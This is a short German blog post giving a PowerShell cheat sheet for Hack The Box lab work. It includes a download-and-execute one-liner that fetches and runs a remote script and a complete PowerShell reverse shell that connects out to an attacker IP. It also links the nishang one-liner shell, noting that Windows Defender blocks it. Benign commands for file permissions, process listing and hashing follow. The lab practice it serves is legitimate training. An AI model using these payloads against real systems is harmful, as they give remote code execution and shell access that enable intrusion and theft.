Secure77

Techblog and Security

Powershell Cheat Sheet (HTB)

Sheets

Powershell Cheat Sheet (HTB)

WIP Cheat Sheet für PowerShell Befehle welche ich immer mal wieder (u.a. im Zusammenhang mit HTB benötige)

Datei über Powershell downloaden und ausführen

"powershell.exe "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"

Powershell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.15.36",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Am besten verwendet man jedoch gleich die nishang shell (wird jedoch vom Windows Defender geblockt)

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1

Datei Downloaden und speichern

wget "http://www.contoso.com" -outfile "file"

Datei und Ordner Berechtigungen anzeigen

Get-Acl -Path C:\temp | Format-List
dir | get-acl

aktive Prozesse anzeigen

Get-Process

MD5 Hashsumme von Datei erzeugen

CertUtil -hashfile <path to file> MD5

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht.